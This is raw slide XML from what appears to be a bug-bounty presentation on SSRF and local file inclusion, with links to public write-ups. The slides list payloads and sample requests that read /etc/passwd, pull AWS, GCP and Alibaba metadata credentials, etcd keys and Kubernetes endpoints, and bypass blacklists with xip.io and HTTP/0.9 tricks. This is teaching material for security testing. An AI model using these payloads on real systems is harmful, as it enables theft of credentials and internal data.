Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1215258237773152257" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=gluSEBZpplQ" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=NWHOmYbLrZ0" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhynorater.github.io/CVE-2020-13379-Write-Up" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/878779" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nccgroup/singularity" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=oxpbmUYCS4g" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Q0JG_eKLcws" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=y9-0lICNjOQ" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/53004" TargetMode="Externa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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/mark_valenzia/status/1258689477460889600" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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hyperlink" Target="https://medium.com/bugbountywriteup/how-i-gained-access-to-sonys-database-f3ba08d0e035" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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51.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1337821232360808453" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xAwali" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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hyperlink" Target="https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/206894" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/411865" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204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hyperlink" Target="https://twitter.com/mdisec/status/1118510746277752832" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/Agarri_FR/status/1118509415286693889" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@pratiky054/ssrf-to-read-local-files-and-abusing-the-aws-metadata-8621a4bf382" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/53877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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="58375"/>
            <a:ext cx="4093800" cy="5084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0" name="Google Shape;200;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731825" y="112700"/>
            <a:ext cx="880200" cy="870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01" name="Google Shape;201;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="206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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150"/>
            <a:ext cx="50301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b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Awali</a:t>
            </a:r>
            <a:b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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1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03" name="Google Shape;203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61200" y="4110576"/>
            <a:ext cx="727375" cy="56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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584900" y="2571738"/>
            <a:ext cx="3916500" cy="5115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                        https://www.company.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3868050" y="339175"/>
            <a:ext cx="5350200" cy="23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75">
            <a:no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Interaction</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:srgbClr val="0B5394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File - URL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="7000">
              <a:solidFill>
                <a:srgbClr val="0B5394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06" name="Google Shape;206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80400" y="2659950"/>
            <a:ext cx="491950" cy="33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9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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file:///etc/./passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is SSRF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326" name="Google Shape;326;p49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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file:///etc/./passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p49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28" name="Google Shape;328;p49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49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30" name="Google Shape;33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9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32" name="Google Shape;332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9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34" name="Google Shape;334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025" y="3067788"/>
            <a:ext cx="421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0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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file://\/\/etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is SSRF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340" name="Google Shape;340;p50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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file://\/\/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p50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42" name="Google Shape;342;p50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50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44" name="Google Shape;34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50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46" name="Google Shape;346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1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Inject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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view-source:file:///etc/passwd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To Get Content Of etc/passwd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If There Is SSRF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352" name="Google Shape;352;p51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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view-source:file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p51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54" name="Google Shape;354;p51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51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56" name="Google Shape;35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51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58" name="Google Shape;358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2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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Internal Services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364" name="Google Shape;364;p52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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:PORT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p52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66" name="Google Shape;366;p52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52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68" name="Google Shape;36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52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70" name="Google Shape;370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38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52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72" name="Google Shape;372;p5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025" y="3537325"/>
            <a:ext cx="421000" cy="3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5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4025" y="39399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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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75" name="Google Shape;375;p5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2925" y="4311450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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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377" name="Google Shape;377;p52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78" name="Google Shape;378;p5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22925" y="3110050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3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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/user-data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract User data 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384" name="Google Shape;384;p53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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/user-data</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p53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86" name="Google Shape;386;p53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53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88" name="Google Shape;38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53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90" name="Google Shape;390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38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53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92" name="Google Shape;392;p5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025" y="3067788"/>
            <a:ext cx="421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4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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>latest/meta-data/iam/security-credentials/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To Extract </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Temporary AWS Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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398" name="Google Shape;398;p54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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>latest/meta-data/iam/security-credentials/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p54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00" name="Google Shape;400;p54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54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402" name="Google Shape;40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54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04" name="Google Shape;404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38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54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06" name="Google Shape;406;p5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925" y="3110050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54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08" name="Google Shape;408;p5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2950" y="351437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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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10" name="Google Shape;410;p5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22925" y="3939538"/>
            <a:ext cx="503200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5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22925" y="4311450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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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5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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://100.100.100.200/latest/meta-data/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http://127.0.0.1:2379/v2/keys/?recursive=true </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Extract Credentials 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418" name="Google Shape;418;p55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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.0.0.1:2379/v2/keys/?recursive=true</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;p55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20" name="Google Shape;420;p55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55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422" name="Google Shape;42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55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24" name="Google Shape;424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6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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://kubernetes.default.svc/metrics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To Extract K</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ubernetes API</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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430" name="Google Shape;430;p56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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://kubernetes.default.svc/metrics</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p56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32" name="Google Shape;432;p56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56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434" name="Google Shape;43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56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36" name="Google Shape;436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7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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metadata.google.internal/computeMetadata/v1beta1/?</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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recursive=true </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To G</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rab All Internal Metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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442" name="Google Shape;442;p57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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metadata.google.internal/computeMetadata/v1beta1/?recursive=true</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p57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44" name="Google Shape;444;p57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57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446" name="Google Shape;44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57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48" name="Google Shape;448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8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169.254.169.254.xip.io</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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454" name="Google Shape;454;p58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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254.xip.io/latest/user-data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455" name="Google Shape;455;p58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56" name="Google Shape;456;p58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58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458" name="Google Shape;45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58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60" name="Google Shape;460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38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58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62" name="Google Shape;462;p5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925" y="3110050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Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../../../../etc/passwd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0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%252fetc%252fpasswd </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is LFI 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212" name="Google Shape;212;p41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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p41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14" name="Google Shape;214;p41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41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16" name="Google Shape;21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41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18" name="Google Shape;218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2675525"/>
            <a:ext cx="4210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1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20" name="Google Shape;220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025" y="3067788"/>
            <a:ext cx="4210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41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22" name="Google Shape;222;p4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4025" y="3525200"/>
            <a:ext cx="4210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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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24" name="Google Shape;224;p4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22925" y="3939538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9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base36(int('254.169.254.169')) e.g. http://1ynrnhl.xip.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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468" name="Google Shape;468;p59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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://1ynrnhl.xip.io/latest/user-data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469" name="Google Shape;469;p59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70" name="Google Shape;470;p59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59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472" name="Google Shape;47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59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74" name="Google Shape;474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38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0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http://www.company.com.1ynrnhl.xip.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>169.254.169.254 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist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480" name="Google Shape;480;p60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/Interaction-File-URL HTTP/1.1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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.company.com1ynrnhl.xip.io/latest/user-data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481" name="Google Shape;481;p60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82" name="Google Shape;482;p60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60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484" name="Google Shape;48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60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86" name="Google Shape;486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38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1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Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host Header</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass Blacklist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492" name="Google Shape;492;p61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/Interaction-File-URL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/0.9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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
